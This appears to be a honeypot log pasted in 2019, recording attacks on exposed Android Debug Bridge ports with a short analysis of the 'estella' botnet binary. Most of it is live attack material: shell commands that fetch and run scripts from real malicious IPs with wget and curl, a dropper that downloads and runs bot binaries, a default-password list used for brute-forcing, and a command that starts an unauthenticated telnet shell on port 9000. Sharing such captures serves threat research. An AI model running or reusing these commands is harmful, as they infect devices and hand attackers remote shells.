
ADB honeypot

a guest
Mar 7th, 2019
  1. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
  2.  
  3. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
  4.  
  5. shell:cd /data/local/tmp/; busybox wget http://185.61.138.13:8080/ adb; rm adb; wget http://185.61.138.13:8080/adb2 -O -> adb2; sh adb2; rm adb2; busybox curl http://185.61.138.13: sh adb3; rm adb3; curl http://185.61.138.13:8080/adb4 > adb4; sh adb4; rm adb4
  6.  
  7. ===================================================================================================================================================
  8.  
  9. $ curl "http://185.244.25.198/curl"
  10. cd /data/local/tmp
  11. rm -rf estella.*
  12. curl http://185.244.25.198/bins/estella.x86 > estella.x86
  13. chmod 777 estella.x86
  14. ./estella.x86 x86
  15. curl http://185.244.25.198/bins/estella.arm7 > estella.arm7
  16. chmod 777 estella.arm7
  17. ./estella.arm7 arm7
  18. rm -rf estella.*
  19.  
  20. $ curl http://185.244.25.198/bins/estella.x86 > estella.x86
  21.  
  22. 9074ef6baa836eb0fabec0a59c46d729 https://www.virustotal.com/#/file/66fe8f2c12b40e647120dad38af15130d3004f5568f6163917400cf3b5d64c29/detection
  23.  
  24. $ strings estella.x86
  25. ...
  26. ...
  27. 8.8.8.8
  28. host::estella
  29. password:
  30. pass word:
  31. username:
  32. user name:
  33. admin
  34. admin$
  35. invalid
  36. not valid
  37. /bin/busybox ESTELLA;
  38. exit;
  39. ldvr %s
  40. quit
  41. shell
  42. SCON
  43. PLSDIE
  44. STOP
  45. /bin/busybox
  46. fo39idkSx
  47. 185.244.25.198
  48. : applet not found
  49. CNXN
  50. OKAY
  51. CNXN
  52. host::estella
  53. OPEN
  54. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
  55. password:
  56. pass word:
  57. username:
  58. user name:
  59. not valid
  60. admin$
  61. admin
  62. I0TO5Wv9
  63. tlJwpbo6
  64. 6QNMIQGe
  65. 123456
  66. 12345
  67. aa888888
  68. 1234
  69. 888888
  70. 0000
  71. 1111
  72. 666666
  73. 654321
  74. 111111
  75. peak0429
  76. cd /var/tmp; echo -e "/bin/busybox telnetd -p9000 -l/bin/sh; /bin/busybox ESTELLA" > telneton; sh telneton;
  77. shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget